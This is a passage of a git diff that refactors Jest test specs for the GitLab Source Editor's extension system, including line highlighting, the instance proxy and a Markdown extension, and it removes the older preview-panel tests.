- // Otherwise we might end up with false positive results - setTimeout(() => { - cb.apply(); - }, 0); - }), - }; -}); +import EditorInstance from '~/editor/source_editor_instance'; describe('The basis for an Source Editor extension', () => { const defaultLine = 3; - let ext; let event; - const defaultOptions = { foo: 'bar' }; const findLine = (num) => { - return document.querySelector(`.line-numbers:nth-child(${num})`); + return document.querySelector(`.${EXTENSION_BASE_LINE_NUMBERS_CLASS}:nth-child(${num})`); }; const generateLines = () => { let res = ''; for (let line = 1, lines = 5; line <= lines; line += 1) { - res += `<div class="line-numbers">${line}</div>`; + res += `<div class="${EXTENSION_BASE_LINE_NUMBERS_CLASS}">${line}</div>`; } return res; }; @@ -49,6 +34,9 @@ describe('The basis for an Source Editor extension', () => { }, }; }; + const createInstance = (baseInstance = {}) => { + return new EditorInstance(baseInstance); + }; beforeEach(() => { setFixtures(generateLines()); @@ -59,95 +47,47 @@ describe('The basis for an Source Editor extension', () => { jest.clearAllMocks(); }); - describe('constructor', () => { - it('resets the layout in waitForCSSLoaded callback', async () => { - const instance = { - layout: jest.fn(), - }; - ext = new SourceEditorExtension({ instance }); - expect(instance.layout).not.toHaveBeenCalled(); - - // We're waiting for the waitForCSSLoaded mock to kick in - await jest.runOnlyPendingTimers(); + describe('onUse callback', () => { + it('initializes the line highlighting', () => { + const instance = createInstance(); + const spy = jest.spyOn(SourceEditorExtension, 'highlightLines'); - expect(instance.layout).toHaveBeenCalled(); + instance.use({ definition: SourceEditorExtension }); + expect(spy).toHaveBeenCalled(); }); it.each` - description | instance | options - ${'accepts configuration options and instance'} | ${{}} | ${defaultOptions} - ${'leaves instance intact if no options are passed'} | ${{}} | ${undefined} - ${'does 
not fail if both instance and the options are omitted'} | ${undefined} | ${undefined} - ${'throws if only options are passed'} | ${undefined} | ${defaultOptions} - `('$description', ({ instance, options } = {}) => { - SourceEditorExtension.deferRerender = jest.fn(); - const originalInstance = { ...instance }; - - if (instance) { - if (options) { - Object.entries(options).forEach((prop) => { - expect(instance[prop]).toBeUndefined(); - }); - // Both instance and options are passed - ext = new SourceEditorExtension({ instance, ...options }); - Object.entries(options).forEach(([prop, value]) => { - expect(ext[prop]).toBeUndefined(); - expect(instance[prop]).toBe(value); - }); + description | instanceType | shouldBeCalled + ${'Sets up'} | ${EDITOR_TYPE_CODE} | ${true} + ${'Does not set up'} | ${EDITOR_TYPE_DIFF} | ${false} + `( + '$description the line linking for $instanceType instance', + ({ instanceType, shouldBeCalled }) => { + const instance = createInstance({ + getEditorType: jest.fn().mockReturnValue(instanceType), + onMouseMove: jest.fn(), + onMouseDown: jest.fn(), + }); + const spy = jest.spyOn(SourceEditorExtension, 'setupLineLinking'); + + instance.use({ definition: SourceEditorExtension }); + if (shouldBeCalled) { + expect(spy).toHaveBeenCalledWith(instance); } else { - ext = new SourceEditorExtension({ instance }); - expect(instance).toEqual(originalInstance); + expect(spy).not.toHaveBeenCalled(); } - } else if (options) { - // Options are passed without instance - expect(() => { - ext = new SourceEditorExtension({ ...options }); - }).toThrow(ERROR_INSTANCE_REQUIRED_FOR_EXTENSION); - } else { - // Neither options nor instance are passed - expect(() => { - ext = new SourceEditorExtension(); - }).not.toThrow(); - } - }); - - it('initializes the line highlighting', () => { - SourceEditorExtension.deferRerender = jest.fn(); - const spy = jest.spyOn(SourceEditorExtension, 'highlightLines'); - ext = new SourceEditorExtension({ instance: {} }); - 
expect(spy).toHaveBeenCalled(); - }); - - it('sets up the line linking for code instance', () => { - SourceEditorExtension.deferRerender = jest.fn(); - const spy = jest.spyOn(SourceEditorExtension, 'setupLineLinking'); - const instance = { - getEditorType: jest.fn().mockReturnValue(EDITOR_TYPE_CODE), - onMouseMove: jest.fn(), - onMouseDown: jest.fn(), - }; - ext = new SourceEditorExtension({ instance }); - expect(spy).toHaveBeenCalledWith(instance); - }); - - it('does not set up the line linking for diff instance', () => { - SourceEditorExtension.deferRerender = jest.fn(); - const spy = jest.spyOn(SourceEditorExtension, 'setupLineLinking'); - const instance = { - getEditorType: jest.fn().mockReturnValue(EDITOR_TYPE_DIFF), - }; - ext = new SourceEditorExtension({ instance }); - expect(spy).not.toHaveBeenCalled(); - }); + }, + ); }); describe('highlightLines', () => { const revealSpy = jest.fn(); const decorationsSpy = jest.fn(); - const instance = { + const instance = createInstance({ revealLineInCenter: revealSpy, deltaDecorations: decorationsSpy, - }; + }); + instance.use({ definition: SourceEditorExtension }); const defaultDecorationOptions = { isWholeLine: true, className: 'active-line-text', @@ -175,7 +115,7 @@ describe('The basis for an Source Editor extension', () => { ${'uses bounds if both hash and bounds exist'} | ${'#L7-42'} | ${[3, 5]} | ${true} | ${[3, 1, 5, 1]} `('$desc', ({ hash, bounds, shouldReveal, expectedRange } = {}) => { window.location.hash = hash; - SourceEditorExtension.highlightLines(instance, bounds); + instance.highlightLines(bounds); if (!shouldReveal) { expect(revealSpy).not.toHaveBeenCalled(); expect(decorationsSpy).not.toHaveBeenCalled(); @@ -193,11 +133,11 @@ describe('The basis for an Source Editor extension', () => { } }); - it('stores the line decorations on the instance', () => { + it('stores the line decorations on the instance', () => { decorationsSpy.mockReturnValue('foo'); window.location.hash = '#L10'; 
expect(instance.lineDecorations).toBeUndefined(); - SourceEditorExtension.highlightLines(instance); + instance.highlightLines(); expect(instance.lineDecorations).toBe('foo'); }); @@ -215,7 +155,7 @@ describe('The basis for an Source Editor extension', () => { }, ]; instance.lineDecorations = oldLineDecorations; - SourceEditorExtension.highlightLines(instance, [7, 10]); + instance.highlightLines([7, 10]); expect(decorationsSpy).toHaveBeenCalledWith(oldLineDecorations, newLineDecorations); }); }); @@ -228,13 +168,18 @@ describe('The basis for an Source Editor extension', () => { options: { isWholeLine: true, className: 'active-line-text' }, }, ]; - const instance = { - deltaDecorations: decorationsSpy, - lineDecorations, - }; + let instance; + + beforeEach(() => { + instance = createInstance({ + deltaDecorations: decorationsSpy, + lineDecorations, + }); + instance.use({ definition: SourceEditorExtension }); + }); it('removes all existing decorations', () => { - SourceEditorExtension.removeHighlights(instance); + instance.removeHighlights(); expect(decorationsSpy).toHaveBeenCalledWith(lineDecorations, []); }); }); @@ -261,9 +206,9 @@ describe('The basis for an Source Editor extension', () => { }); it.each` - desc | eventTrigger | shouldRemove - ${'does not remove the line decorations if the event is triggered on a wrong node'} | ${null} | ${false} - ${'removes existing line decorations when clicking a line number'} | ${'.link-anchor'} | ${true} + desc | eventTrigger | shouldRemove + ${'does not remove the line decorations if the event is triggered on a wrong node'} | ${null} | ${false} + ${'removes existing line decorations when clicking a line number'} | ${`.${EXTENSION_BASE_LINE_LINK_ANCHOR_CLASS}`} | ${true} `('$desc', ({ eventTrigger, shouldRemove } = {}) => { event = generateEventMock({ el: eventTrigger ? 
document.querySelector(eventTrigger) : null }); instance.onMouseDown.mockImplementation((fn) => { diff --git a/spec/frontend/editor/source_editor_extension_spec.js b/spec/frontend/editor/source_editor_extension_spec.js index 6f2eb07a043..c5fa795f3b7 100644 --- a/spec/frontend/editor/source_editor_extension_spec.js +++ b/spec/frontend/editor/source_editor_extension_spec.js @@ -22,15 +22,15 @@ describe('Editor Extension', () => { it.each` definition | setupOptions | expectedName - ${helpers.MyClassExtension} | ${undefined} | ${'MyClassExtension'} - ${helpers.MyClassExtension} | ${{}} | ${'MyClassExtension'} - ${helpers.MyClassExtension} | ${dummyObj} | ${'MyClassExtension'} - ${helpers.MyFnExtension} | ${undefined} | ${'MyFnExtension'} - ${helpers.MyFnExtension} | ${{}} | ${'MyFnExtension'} - ${helpers.MyFnExtension} | ${dummyObj} | ${'MyFnExtension'} - ${helpers.MyConstExt} | ${undefined} | ${'MyConstExt'} - ${helpers.MyConstExt} | ${{}} | ${'MyConstExt'} - ${helpers.MyConstExt} | ${dummyObj} | ${'MyConstExt'} + ${helpers.SEClassExtension} | ${undefined} | ${'SEClassExtension'} + ${helpers.SEClassExtension} | ${{}} | ${'SEClassExtension'} + ${helpers.SEClassExtension} | ${dummyObj} | ${'SEClassExtension'} + ${helpers.SEFnExtension} | ${undefined} | ${'SEFnExtension'} + ${helpers.SEFnExtension} | ${{}} | ${'SEFnExtension'} + ${helpers.SEFnExtension} | ${dummyObj} | ${'SEFnExtension'} + ${helpers.SEConstExt} | ${undefined} | ${'SEConstExt'} + ${helpers.SEConstExt} | ${{}} | ${'SEConstExt'} + ${helpers.SEConstExt} | ${dummyObj} | ${'SEConstExt'} `( 'correctly creates extension for definition = $definition and setupOptions = $setupOptions', ({ definition, setupOptions, expectedName }) => { @@ -40,7 +40,7 @@ describe('Editor Extension', () => { expect(extension).toEqual( expect.objectContaining({ - name: expectedName, + extensionName: expectedName, setupOptions, }), ); @@ -51,9 +51,9 @@ describe('Editor Extension', () => { describe('api', () => { it.each` definition | 
expectedKeys - ${helpers.MyClassExtension} | ${['shared', 'classExtMethod']} - ${helpers.MyFnExtension} | ${['fnExtMethod']} - ${helpers.MyConstExt} | ${['constExtMethod']} + ${helpers.SEClassExtension} | ${['shared', 'classExtMethod']} + ${helpers.SEFnExtension} | ${['fnExtMethod']} + ${helpers.SEConstExt} | ${['constExtMethod']} `('correctly returns API for $definition', ({ definition, expectedKeys }) => { const extension = new EditorExtension({ definition }); const expectedApi = Object.fromEntries( diff --git a/spec/frontend/editor/source_editor_instance_spec.js b/spec/frontend/editor/source_editor_instance_spec.js index 87b20a4ba73..f9518743ef8 100644 --- a/spec/frontend/editor/source_editor_instance_spec.js +++ b/spec/frontend/editor/source_editor_instance_spec.js @@ -6,31 +6,43 @@ import { EDITOR_EXTENSION_NOT_REGISTERED_ERROR, EDITOR_EXTENSION_NOT_SPECIFIED_FOR_UNUSE_ERROR, } from '~/editor/constants'; -import Instance from '~/editor/source_editor_instance'; +import SourceEditorInstance from '~/editor/source_editor_instance'; import { sprintf } from '~/locale'; -import { MyClassExtension, conflictingExtensions, MyFnExtension, MyConstExt } from './helpers'; +import { + SEClassExtension, + conflictingExtensions, + SEFnExtension, + SEConstExt, + SEWithSetupExt, +} from './helpers'; describe('Source Editor Instance', () => { let seInstance; const defSetupOptions = { foo: 'bar' }; const fullExtensionsArray = [ - { definition: MyClassExtension }, - { definition: MyFnExtension }, - { definition: MyConstExt }, + { definition: SEClassExtension }, + { definition: SEFnExtension }, + { definition: SEConstExt }, ]; const fullExtensionsArrayWithOptions = [ - { definition: MyClassExtension, setupOptions: defSetupOptions }, - { definition: MyFnExtension, setupOptions: defSetupOptions }, - { definition: MyConstExt, setupOptions: defSetupOptions }, + { definition: SEClassExtension, setupOptions: defSetupOptions }, + { definition: SEFnExtension, setupOptions: defSetupOptions 
}, + { definition: SEConstExt, setupOptions: defSetupOptions }, ]; const fooFn = jest.fn(); + const fooProp = 'foo'; class DummyExt { // eslint-disable-next-line class-methods-use-this + get extensionName() { + return 'DummyExt'; + } + // eslint-disable-next-line class-methods-use-this provides() { return { fooFn, + fooProp, }; } } @@ -40,26 +52,26 @@ describe('Source Editor Instance', () => { }); it('sets up the registry for the methods coming from extensions', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); expect(seInstance.methods).toBeDefined(); - seInstance.use({ definition: MyClassExtension }); + seInstance.use({ definition: SEClassExtension }); expect(seInstance.methods).toEqual({ - shared: 'MyClassExtension', - classExtMethod: 'MyClassExtension', + shared: 'SEClassExtension', + classExtMethod: 'SEClassExtension', }); - seInstance.use({ definition: MyFnExtension }); + seInstance.use({ definition: SEFnExtension }); expect(seInstance.methods).toEqual({ - shared: 'MyClassExtension', - classExtMethod: 'MyClassExtension', - fnExtMethod: 'MyFnExtension', + shared: 'SEClassExtension', + classExtMethod: 'SEClassExtension', + fnExtMethod: 'SEFnExtension', }); }); describe('proxy', () => { - it('returns prop from an extension if extension provides it', () => { - seInstance = new Instance(); + it('returns a method from an extension if extension provides it', () => { + seInstance = new SourceEditorInstance(); seInstance.use({ definition: DummyExt }); expect(fooFn).not.toHaveBeenCalled(); @@ -67,20 +79,77 @@ describe('Source Editor Instance', () => { expect(fooFn).toHaveBeenCalled(); }); + it('returns a prop from an extension if extension provides it', () => { + seInstance = new SourceEditorInstance(); + seInstance.use({ definition: DummyExt }); + + expect(seInstance.fooProp).toBe('foo'); + }); + + it.each` + stringPropToPass | objPropToPass | setupOptions + ${undefined} | ${undefined} | ${undefined} + ${'prop'} | ${undefined} | 
${undefined} + ${'prop'} | ${[]} | ${undefined} + ${'prop'} | ${{}} | ${undefined} + ${'prop'} | ${{ alpha: 'beta' }} | ${undefined} + ${'prop'} | ${{ alpha: 'beta' }} | ${defSetupOptions} + ${'prop'} | ${undefined} | ${defSetupOptions} + ${undefined} | ${undefined} | ${defSetupOptions} + ${''} | ${{}} | ${defSetupOptions} + `( + 'correctly passes arguments ("$stringPropToPass", "$objPropToPass") and instance (with "$setupOptions" setupOptions) to extension methods', + ({ stringPropToPass, objPropToPass, setupOptions }) => { + seInstance = new SourceEditorInstance(); + seInstance.use({ definition: SEWithSetupExt, setupOptions }); + + const [stringProp, objProp, instance] = seInstance.returnInstanceAndProps( + stringPropToPass, + objPropToPass, + ); + const expectedObjProps = objPropToPass || {}; + + expect(instance).toBe(seInstance); + expect(stringProp).toBe(stringPropToPass); + expect(objProp).toEqual(expectedObjProps); + if (setupOptions) { + Object.keys(setupOptions).forEach((key) => { + expect(instance[key]).toBe(setupOptions[key]); + }); + } + }, + ); + + it('correctly passes instance to the methods even if no additional props have been passed', () => { + seInstance = new SourceEditorInstance(); + seInstance.use({ definition: SEWithSetupExt }); + + const instance = seInstance.returnInstance(); + + expect(instance).toBe(seInstance); + }); + + it("correctly sets the context of the 'this' keyword for the extension's methods", () => { + seInstance = new SourceEditorInstance(); + const extension = seInstance.use({ definition: SEWithSetupExt }); + + expect(seInstance.giveMeContext()).toEqual(extension.obj); + }); + it('returns props from SE instance itself if no extension provides the prop', () => { - seInstance = new Instance({ + seInstance = new SourceEditorInstance({ use: fooFn, }); - jest.spyOn(seInstance, 'use').mockImplementation(() => {}); - expect(seInstance.use).not.toHaveBeenCalled(); + const spy = jest.spyOn(seInstance.constructor.prototype, 
'use').mockImplementation(() => {}); + expect(spy).not.toHaveBeenCalled(); expect(fooFn).not.toHaveBeenCalled(); seInstance.use(); - expect(seInstance.use).toHaveBeenCalled(); + expect(spy).toHaveBeenCalled(); expect(fooFn).not.toHaveBeenCalled(); }); it('returns props from Monaco instance when the prop does not exist on the SE instance', () => { - seInstance = new Instance({ + seInstance = new SourceEditorInstance({ fooFn, }); @@ -92,13 +161,13 @@ describe('Source Editor Instance', () => { describe('public API', () => { it.each(['use', 'unuse'], 'provides "%s" as public method by default', (method) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); expect(seInstance[method]).toBeDefined(); }); describe('use', () => { it('extends the SE instance with methods provided by an extension', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); seInstance.use({ definition: DummyExt }); expect(fooFn).not.toHaveBeenCalled(); @@ -108,15 +177,15 @@ describe('Source Editor Instance', () => { it.each` extensions | expectedProps - ${{ definition: MyClassExtension }} | ${['shared', 'classExtMethod']} - ${{ definition: MyFnExtension }} | ${['fnExtMethod']} - ${{ definition: MyConstExt }} | ${['constExtMethod']} + ${{ definition: SEClassExtension }} | ${['shared', 'classExtMethod']} + ${{ definition: SEFnExtension }} | ${['fnExtMethod']} + ${{ definition: SEConstExt }} | ${['constExtMethod']} ${fullExtensionsArray} | ${['shared', 'classExtMethod', 'fnExtMethod', 'constExtMethod']} ${fullExtensionsArrayWithOptions} | ${['shared', 'classExtMethod', 'fnExtMethod', 'constExtMethod']} `( 'Should register $expectedProps when extension is "$extensions"', ({ extensions, expectedProps }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); expect(seInstance.extensionsAPI).toHaveLength(0); seInstance.use(extensions); @@ -127,15 +196,15 @@ describe('Source Editor Instance', () => { it.each` definition | 
preInstalledExtDefinition | expectedErrorProp - ${conflictingExtensions.WithInstanceExt} | ${MyClassExtension} | ${'use'} + ${conflictingExtensions.WithInstanceExt} | ${SEClassExtension} | ${'use'} ${conflictingExtensions.WithInstanceExt} | ${null} | ${'use'} ${conflictingExtensions.WithAnotherExt} | ${null} | ${undefined} - ${conflictingExtensions.WithAnotherExt} | ${MyClassExtension} | ${'shared'} - ${MyClassExtension} | ${conflictingExtensions.WithAnotherExt} | ${'shared'} + ${conflictingExtensions.WithAnotherExt} | ${SEClassExtension} | ${'shared'} + ${SEClassExtension} | ${conflictingExtensions.WithAnotherExt} | ${'shared'} `( 'logs the naming conflict error when registering $definition', ({ definition, preInstalledExtDefinition, expectedErrorProp }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); jest.spyOn(console, 'error').mockImplementation(() => {}); if (preInstalledExtDefinition) { @@ -175,7 +244,7 @@ describe('Source Editor Instance', () => { `( 'Should throw $thrownError when extension is "$extensions"', ({ extensions, thrownError }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const useExtension = () => { seInstance.use(extensions); }; @@ -188,24 +257,24 @@ describe('Source Editor Instance', () => { beforeEach(() => { extensionStore = new Map(); - seInstance = new Instance({}, extensionStore); + seInstance = new SourceEditorInstance({}, extensionStore); }); it('stores _instances_ of the used extensions in a global registry', () => { - const extension = seInstance.use({ definition: MyClassExtension }); + const extension = seInstance.use({ definition: SEClassExtension }); expect(extensionStore.size).toBe(1); - expect(extensionStore.entries().next().value).toEqual(['MyClassExtension', extension]); + expect(extensionStore.entries().next().value).toEqual(['SEClassExtension', extension]); }); it('does not duplicate entries in the registry', () => { jest.spyOn(extensionStore, 'set'); - const 
extension1 = seInstance.use({ definition: MyClassExtension }); - seInstance.use({ definition: MyClassExtension }); + const extension1 = seInstance.use({ definition: SEClassExtension }); + seInstance.use({ definition: SEClassExtension }); expect(extensionStore.set).toHaveBeenCalledTimes(1); - expect(extensionStore.set).toHaveBeenCalledWith('MyClassExtension', extension1); + expect(extensionStore.set).toHaveBeenCalledWith('SEClassExtension', extension1); }); it.each` @@ -222,20 +291,20 @@ describe('Source Editor Instance', () => { jest.spyOn(extensionStore, 'set'); const extension1 = seInstance.use({ - definition: MyClassExtension, + definition: SEClassExtension, setupOptions: currentSetupOptions, }); const extension2 = seInstance.use({ - definition: MyClassExtension, + definition: SEClassExtension, setupOptions: newSetupOptions, }); expect(extensionStore.size).toBe(1); expect(extensionStore.set).toHaveBeenCalledTimes(expectedCallTimes); if (expectedCallTimes > 1) { - expect(extensionStore.set).toHaveBeenCalledWith('MyClassExtension', extension2); + expect(extensionStore.set).toHaveBeenCalledWith('SEClassExtension', extension2); } else { - expect(extensionStore.set).toHaveBeenCalledWith('MyClassExtension', extension1); + expect(extensionStore.set).toHaveBeenCalledWith('SEClassExtension', extension1); } }, ); @@ -252,7 +321,7 @@ describe('Source Editor Instance', () => { `( `Should throw "${EDITOR_EXTENSION_NOT_SPECIFIED_FOR_UNUSE_ERROR}" when extension is "$unuseExtension"`, ({ unuseExtension, thrownError }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const unuse = () => { seInstance.unuse(unuseExtension); }; @@ -262,16 +331,16 @@ describe('Source Editor Instance', () => { it.each` initExtensions | unuseExtensionIndex | remainingAPI - ${{ definition: MyClassExtension }} | ${0} | ${[]} - ${{ definition: MyFnExtension }} | ${0} | ${[]} - ${{ definition: MyConstExt }} | ${0} | ${[]} + ${{ definition: SEClassExtension }} | ${0} | ${[]} 
+ ${{ definition: SEFnExtension }} | ${0} | ${[]} + ${{ definition: SEConstExt }} | ${0} | ${[]} ${fullExtensionsArray} | ${0} | ${['fnExtMethod', 'constExtMethod']} ${fullExtensionsArray} | ${1} | ${['shared', 'classExtMethod', 'constExtMethod']} ${fullExtensionsArray} | ${2} | ${['shared', 'classExtMethod', 'fnExtMethod']} `( 'un-registers properties introduced by single extension $unuseExtension', ({ initExtensions, unuseExtensionIndex, remainingAPI }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const extensions = seInstance.use(initExtensions); if (Array.isArray(initExtensions)) { @@ -291,7 +360,7 @@ describe('Source Editor Instance', () => { `( 'un-registers properties introduced by multiple extensions $unuseExtension', ({ unuseExtensionIndex, remainingAPI }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const extensions = seInstance.use(fullExtensionsArray); const extensionsToUnuse = extensions.filter((ext, index) => unuseExtensionIndex.includes(index), @@ -304,11 +373,11 @@ describe('Source Editor Instance', () => { it('it does not remove entry from the global registry to keep for potential future re-use', () => { const extensionStore = new Map(); - seInstance = new Instance({}, extensionStore); + seInstance = new SourceEditorInstance({}, extensionStore); const extensions = seInstance.use(fullExtensionsArray); const verifyExpectations = () => { const entries = extensionStore.entries(); - const mockExtensions = ['MyClassExtension', 'MyFnExtension', 'MyConstExt']; + const mockExtensions = ['SEClassExtension', 'SEFnExtension', 'SEConstExt']; expect(extensionStore.size).toBe(mockExtensions.length); mockExtensions.forEach((ext, index) => { expect(entries.next().value).toEqual([ext, extensions[index]]); @@ -326,7 +395,7 @@ describe('Source Editor Instance', () => { beforeEach(() => { instanceModel = monacoEditor.createModel(''); - seInstance = new Instance({ + seInstance = new 
SourceEditorInstance({ getModel: () => instanceModel, }); }); @@ -363,17 +432,17 @@ describe('Source Editor Instance', () => { }; it('passes correct arguments to callback fns when using an extension', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); seInstance.use({ definition: MyFullExtWithCallbacks, setupOptions: defSetupOptions, }); - expect(onSetup).toHaveBeenCalledWith(defSetupOptions, seInstance); + expect(onSetup).toHaveBeenCalledWith(seInstance, defSetupOptions); expect(onUse).toHaveBeenCalledWith(seInstance); }); it('passes correct arguments to callback fns when un-using an extension', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const extension = seInstance.use({ definition: MyFullExtWithCallbacks, setupOptions: defSetupOptions, diff --git a/spec/frontend/editor/source_editor_markdown_ext_spec.js b/spec/frontend/editor/source_editor_markdown_ext_spec.js index 245c6c28d31..eecd23bff6e 100644 --- a/spec/frontend/editor/source_editor_markdown_ext_spec.js +++ b/spec/frontend/editor/source_editor_markdown_ext_spec.js @@ -1,36 +1,19 @@ import MockAdapter from 'axios-mock-adapter'; -import { Range, Position, editor as monacoEditor } from 'monaco-editor'; -import waitForPromises from 'helpers/wait_for_promises'; -import { - EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS, - EXTENSION_MARKDOWN_PREVIEW_ACTION_ID, - EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, - EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS, - EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY, -} from '~/editor/constants'; +import { Range, Position } from 'monaco-editor'; import { EditorMarkdownExtension } from '~/editor/extensions/source_editor_markdown_ext'; import SourceEditor from '~/editor/source_editor'; -import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; -import syntaxHighlight from '~/syntax_highlight'; - -jest.mock('~/syntax_highlight'); -jest.mock('~/flash'); describe('Markdown Extension for Source Editor', () => { 
let editor; let instance; let editorEl; - let panelSpy; let mockAxios; - const previewMarkdownPath = '/gitlab/fooGroup/barProj/preview_markdown'; const firstLine = 'This is a'; const secondLine = 'multiline'; const thirdLine = 'string with some **markup**'; const text = `${firstLine}\n${secondLine}\n${thirdLine}`; - const plaintextPath = 'foo.txt'; const markdownPath = 'foo.md'; - const responseData = '<div>FooBar</div>'; const setSelection = (startLineNumber = 1, startColumn = 1, endLineNumber = 1, endColumn = 1) => { const selection = new Range(startLineNumber, startColumn, endLineNumber, endColumn); @@ -42,11 +25,6 @@ describe('Markdown Extension for Source Editor', () => { const selectionToString = () => instance.getSelection().toString(); const positionToString = () => instance.getPosition().toString(); - const togglePreview = async () => { - instance.togglePreview(); - await waitForPromises(); - }; - beforeEach(() => { mockAxios = new MockAdapter(axios); setFixtures('<div id="editor" data-editor-loading></div>'); @@ -57,8 +35,7 @@ describe('Markdown Extension for Source Editor', () => { blobPath: markdownPath, blobContent: text, }); - editor.use(new EditorMarkdownExtension({ instance, previewMarkdownPath })); - panelSpy = jest.spyOn(EditorMarkdownExtension, 'togglePreviewPanel'); + instance.use({ definition: EditorMarkdownExtension }); }); afterEach(() => { @@ -67,345 +44,6 @@ describe('Markdown Extension for Source Editor', () => { mockAxios.restore(); }); - it('sets up the instance', () => { - expect(instance.preview).toEqual({ - el: undefined, - action: expect.any(Object), - shown: false, - modelChangeListener: undefined, - }); - expect(instance.previewMarkdownPath).toBe(previewMarkdownPath); - }); - - describe('model language changes listener', () => { - let cleanupSpy; - let actionSpy; - - beforeEach(async () => { - cleanupSpy = jest.spyOn(instance, 'cleanup'); - actionSpy = jest.spyOn(instance, 'setupPreviewAction'); - await togglePreview(); - }); - - 
it('cleans up when switching away from markdown', () => { - expect(instance.cleanup).not.toHaveBeenCalled(); - expect(instance.setupPreviewAction).not.toHaveBeenCalled(); - - instance.updateModelLanguage(plaintextPath); - - expect(cleanupSpy).toHaveBeenCalled(); - expect(actionSpy).not.toHaveBeenCalled(); - }); - - it.each` - oldLanguage | newLanguage | setupCalledTimes - ${'plaintext'} | ${'markdown'} | ${1} - ${'markdown'} | ${'markdown'} | ${0} - ${'markdown'} | ${'plaintext'} | ${0} - ${'markdown'} | ${undefined} | ${0} - ${undefined} | ${'markdown'} | ${1} - `( - 'correctly handles re-enabling of the action when switching from $oldLanguage to $newLanguage', - ({ oldLanguage, newLanguage, setupCalledTimes } = {}) => { - expect(actionSpy).not.toHaveBeenCalled(); - instance.updateModelLanguage(oldLanguage); - instance.updateModelLanguage(newLanguage); - expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); - }, - ); - }); - - describe('model change listener', () => { - let cleanupSpy; - let actionSpy; - - beforeEach(() => { - cleanupSpy = jest.spyOn(instance, 'cleanup'); - actionSpy = jest.spyOn(instance, 'setupPreviewAction'); - instance.togglePreview(); - }); - - afterEach(() => { - jest.clearAllMocks(); - }); - - it('does not do anything if there is no model', () => { - instance.setModel(null); - - expect(cleanupSpy).not.toHaveBeenCalled(); - expect(actionSpy).not.toHaveBeenCalled(); - }); - - it('cleans up the preview when the model changes', () => { - instance.setModel(monacoEditor.createModel('foo')); - expect(cleanupSpy).toHaveBeenCalled(); - }); - - it.each` - language | setupCalledTimes - ${'markdown'} | ${1} - ${'plaintext'} | ${0} - ${undefined} | ${0} - `( - 'correctly handles actions when the new model is $language', - ({ language, setupCalledTimes } = {}) => { - instance.setModel(monacoEditor.createModel('foo', language)); - - expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); - }, - ); - }); - - describe('cleanup', () => { - 
beforeEach(async () => { - mockAxios.onPost().reply(200, { body: responseData }); - await togglePreview(); - }); - - it('disposes the modelChange listener and does not fetch preview on content changes', () => { - expect(instance.preview.modelChangeListener).toBeDefined(); - jest.spyOn(instance, 'fetchPreview'); - - instance.cleanup(); - instance.setValue('Foo Bar'); - jest.advanceTimersByTime(EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY); - - expect(instance.fetchPreview).not.toHaveBeenCalled(); - }); - - it('removes the contextual menu action', () => { - expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); - - instance.cleanup(); - - expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBe(null); - }); - - it('toggles the `shown` flag', () => { - expect(instance.preview.shown).toBe(true); - instance.cleanup(); - expect(instance.preview.shown).toBe(false); - }); - - it('toggles the panel only if the preview is visible', () => { - const { el: previewEl } = instance.preview; - const parentEl = previewEl.parentElement; - - expect(previewEl).toBeVisible(); - expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe(true); - - instance.cleanup(); - expect(previewEl).toBeHidden(); - expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - - instance.cleanup(); - expect(previewEl).toBeHidden(); - expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - }); - - it('toggles the layout only if the preview is visible', () => { - const { width } = instance.getLayoutInfo(); - - expect(instance.preview.shown).toBe(true); - - instance.cleanup(); - - const { width: newWidth } = instance.getLayoutInfo(); - expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); - - instance.cleanup(); - expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); - }); - }); - - 
describe('fetchPreview', () => { - const fetchPreview = async () => { - instance.fetchPreview(); - await waitForPromises(); - }; - - let previewMarkdownSpy; - - beforeEach(() => { - previewMarkdownSpy = jest.fn().mockImplementation(() => [200, { body: responseData }]); - mockAxios.onPost(previewMarkdownPath).replyOnce((req) => previewMarkdownSpy(req)); - }); - - it('correctly fetches preview based on previewMarkdownPath', async () => { - await fetchPreview(); - - expect(previewMarkdownSpy).toHaveBeenCalledWith( - expect.objectContaining({ data: JSON.stringify({ text }) }), - ); - }); - - it('puts the fetched content into the preview DOM element', async () => { - instance.preview.el = editorEl.parentElement; - await fetchPreview(); - expect(instance.preview.el.innerHTML).toEqual(responseData); - }); - - it('applies syntax highlighting to the preview content', async () => { - instance.preview.el = editorEl.parentElement; - await fetchPreview(); - expect(syntaxHighlight).toHaveBeenCalled(); - }); - - it('catches the errors when fetching the preview', async () => { - mockAxios.onPost().reply(500); - - await fetchPreview(); - expect(createFlash).toHaveBeenCalled(); - }); - }); - - describe('setupPreviewAction', () => { - it('adds the contextual menu action', () => { - expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); - }); - - it('does not set up action if one already exists', () => { - jest.spyOn(instance, 'addAction').mockImplementation(); - - 